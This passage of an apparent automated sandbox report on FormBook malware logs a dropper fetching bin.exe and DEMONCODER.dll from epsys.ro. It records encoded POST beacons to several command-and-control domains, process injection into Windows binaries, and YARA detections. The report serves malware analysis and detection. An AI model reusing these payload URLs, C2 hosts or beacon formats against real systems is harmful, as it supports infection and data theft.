                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.8 | 49739 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:29.247443914 CEST | 1653 | OUT | POST /2w7y/ HTTP/1.1
                                                    Host: www.filelabel.info
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.filelabel.info
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.filelabel.info/2w7y/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.8 | 49740 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:31.785795927 CEST | 360 | OUT | GET /2w7y/?dD=3XyH6pjxGLhPK&7FhphPx8=Lawv0YecSOnZdZmp6B7rN+coqY7pSb/9YfPVtq1IvWwToR7xRnuq3CLFfh0Vaxr7O62UC86yvXBBKTgeeftZ3A1ObV/07dRLVO5P4hXPb+DhwEJ5M29tcAJMbTexkiGgNw== HTTP/1.1
                                                    Host: www.filelabel.info
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:32.246546984 CEST | 413 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:45:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dD=3XyH6pjxGLhPK&7FhphPx8=Lawv0YecSOnZdZmp6B7rN+coqY7pSb/9YfPVtq1IvWwToR7xRnuq3CLFfh0Vaxr7O62UC86yvXBBKTgeeftZ3A1ObV/07dRLVO5P4hXPb+DhwEJ5M29tcAJMbTexkiGgNw=="}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    25 | 192.168.2.8 | 49741 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:37.295428038 CEST | 607 | OUT | POST /y13u/ HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.comrade.lol
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.comrade.lol/y13u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=SFffUY5xPC+OXMnuwvbpaSzHQYqLLk0swMUXtvIB1t+2fHUTfFVA6iy03uRaJeo2GU4RW2vDDM35/rdnr0ayh4xeIbljl4muU+0jB+L1RkmpW/ApWzqor6LIVT3GjT7EMcL/LV871hstMUHwHF9e+vrHAuUwE3G2jYp4bOhwCMSwHFUfEjBQwUVnxvBVyVLL/OXOc30=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.8 | 49742 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:39.844402075 CEST | 627 | OUT | POST /y13u/ HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.comrade.lol
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.comrade.lol/y13u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=SFffUY5xPC+OWvvuxMjpSSzEVYqLeU0owMYXtuMv1ZS2fiQTcEVA5iy0j+QQNeoxGUlmW3TDDMj5/qNnrnCzgoxLRrlloYmuU+0jB+fLRiOpWPQpVSqro6LXWT3GyD7AMcLnLUgB1jktMWfwHU9dnfr7OOVVVlD7prpLQfNgAdrUGz51eBJWzU9Mxspj3iWjltH+Cgj8k5qy9UycCUZpz4vE7iUY


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.8 | 49743 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:42.380361080 CEST | 1644 | OUT | POST /y13u/ HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.comrade.lol
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.comrade.lol/y13u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.8 | 49744 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:44.929357052 CEST | 357 | OUT | GET /y13u/?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:46.317312956 CEST | 413 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:45:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPK"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.8 | 49745 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:51.373349905 CEST | 610 | OUT | POST /484o/ HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.takitoon.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.takitoon.xyz/484o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=+3Pq0AkBgUgbv9clYuZA57NJDTtRaCIZEeuO38DiqarpNk2hvk6w0PejiuYLbQ1J9AGgSG1UOKy+w44EejCuiC7yEdZkUJRKw77Y5EvJVnZai2hq44fQ8e/X8ya1NnMvW0NAZJZ/MCaABuIAJcyExxxmt3WV94j/geCKZYYcBHFitRVEdTOzYdWlKkuYUuSBvDc3bUI=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.8 | 49746 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:53.913382053 CEST | 630 | OUT | POST /484o/ HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.takitoon.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.takitoon.xyz/484o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=+3Pq0AkBgUgbudslZNxAx7NWdjtRTiIjEeiO39HyqI/pNFGhuguw1PejpOYEGA1C9ADDSDNUOLW+w5oEeyCpwi70P9ZmbpRKw77Y5FLvVnBaiGRq5ZfX1+/UsCa1JnNHW0N2ZJoSMASABsQAJNyF/xxkgXXEu6qtusC9C756Bl5MlH4uHxG1bd+OKnGuRZPp1gMHFDe90esZGcNSvHky+XTb7Eza


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.8 | 49747 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:56.461873055 CEST | 1647 | OUT | POST /484o/ HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.takitoon.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.takitoon.xyz/484o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.8 | 49748 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:59.003318071 CEST | 358 | OUT | GET /484o/?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA== HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:59.501399994 CEST | 413 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:45:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA=="}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.8 | 49749 | 199.59.243.226 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:46:04.625808954 CEST | 622 | OUT | POST /zksk/ HTTP/1.1
                                                    Host: www.pmjjewels.online
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.pmjjewels.online
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.pmjjewels.online/zksk/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=capglLxl7z4IUJwVn39jC7tBBQh2oiqapu7iuamaTjN+GLk+xIDvginOYXA0/tgpVWXQyzl+Vd+phbibw1Gwlrgx+z9j/U/5mot7Vr0vnYn5FJ1XpW9KdC90LE/naSQrFcli9ovElxFT94zWG9ckeMJjYibzLndN5fa9JWtSA++JAwi8u/48ynWlmQz+vkRWHIZxXiQ=
                                                    Sep 11, 2024 15:46:05.086605072 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Wed, 11 Sep 2024 13:46:04 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1130
                                                    x-request-id: 3d8430e7-eceb-419d-8cbb-c166a23fb2c9
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==
                                                    set-cookie: parking_session=3d8430e7-eceb-419d-8cbb-c166a23fb2c9; expires=Wed, 11 Sep 2024 14:01:05 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 11, 2024 15:46:05.086668015 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2Q4NDMwZTctZWNlYi00MTlkLThjYmItYzE2NmEyM2ZiMmM5IiwicGFnZV90aW1lIjoxNzI2MDYyMz


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.8 | 49750 | 199.59.243.226 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:46:07.169382095 CEST | 642 | OUT | POST /zksk/ HTTP/1.1
                                                    Host: www.pmjjewels.online
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.pmjjewels.online
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.pmjjewels.online/zksk/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:46:07.614717007 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Wed, 11 Sep 2024 13:46:06 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1130
                                                    x-request-id: e29d9534-b481-4c0e-ba6a-df7e4f57182f
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==
                                                    set-cookie: parking_session=e29d9534-b481-4c0e-ba6a-df7e4f57182f; expires=Wed, 11 Sep 2024 14:01:07 GMT; path=/
                                                    connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.8 | 49751 | 199.59.243.226 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:46:09.712253094 CEST | 1659 | OUT | POST /zksk/ HTTP/1.1
                                                    Host: www.pmjjewels.online
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.pmjjewels.online
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.pmjjewels.online/zksk/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:46:10.186181068 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Wed, 11 Sep 2024 13:46:10 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1130
                                                    x-request-id: d2da571c-16d5-4686-ba43-b014093372f3
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oczZobKLtdrdoLIypZ3JJE9lhQSCWf0XHdNaLNMIaOKpySVIWUgrfKtQ85wpky3GL1nCaPhoMNRA7L3teKi0GQ==
                                                    set-cookie: parking_session=d2da571c-16d5-4686-ba43-b014093372f3; expires=Wed, 11 Sep 2024 14:01:10 GMT; path=/
                                                    connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.8 | 49706 | 89.42.218.72 | 443 | 6364 | C:\Users\user\Desktop\x.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-09-11 13:43:05 UTC | 68 | OUT | GET /we/bin.exe HTTP/1.1
                                                    Host: epsys.ro
                                                    Connection: Keep-Alive
                                                    2024-09-11 13:43:06 UTC | 292 | IN | HTTP/1.1 200 OK
                                                    Connection: close
                                                    content-type: application/x-msdownload
                                                    last-modified: Wed, 11 Sep 2024 02:12:18 GMT
                                                    accept-ranges: bytes
                                                    content-length: 286720
                                                    date: Wed, 11 Sep 2024 13:43:04 GMT
                                                    server: LiteSpeed
                                                    x-xss-protection: 1; mode=block
                                                    x-content-type-options: nosniff


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.8 | 49707 | 89.42.218.72 | 443 | 6364 | C:\Users\user\Desktop\x.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-09-11 13:43:07 UTC | 51 | OUT | GET /we/DEMONCODER.dll HTTP/1.1
                                                    Host: epsys.ro
                                                    2024-09-11 13:43:07 UTC | 291 | IN | HTTP/1.1 200 OK
                                                    Connection: close
                                                    content-type: application/x-msdownload
                                                    last-modified: Fri, 06 Sep 2024 12:46:32 GMT
                                                    accept-ranges: bytes
                                                    content-length: 15360
                                                    date: Wed, 11 Sep 2024 13:43:06 GMT
                                                    server: LiteSpeed
                                                    x-xss-protection: 1; mode=block
                                                    x-content-type-options: nosniff


                                                    Target ID:0
                                                    Start time:09:43:03
                                                    Start date:11/09/2024
                                                    Path:C:\Users\user\Desktop\x.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\x.exe"
                                                    Imagebase:0xe00000
                                                    File size:24'576 bytes
                                                    MD5 hash:BA5EE405D2CC8EF536634C4E8E4BF0CB
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:2
                                                    Start time:09:43:06
                                                    Start date:11/09/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                    Imagebase:0x2d0000
                                                    File size:56'368 bytes
                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:43:06
                                                    Start date:11/09/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                    Imagebase:0xf30000
                                                    File size:56'368 bytes
                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:09:43:38
                                                    Start date:11/09/2024
                                                    Path:C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe"
                                                    Imagebase:0x540000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:09:43:41
                                                    Start date:11/09/2024
                                                    Path:C:\Windows\SysWOW64\rasdial.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                    Imagebase:0x980000
                                                    File size:19'456 bytes
                                                    MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:09:43:53
                                                    Start date:11/09/2024
                                                    Path:C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe"
                                                    Imagebase:0x540000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
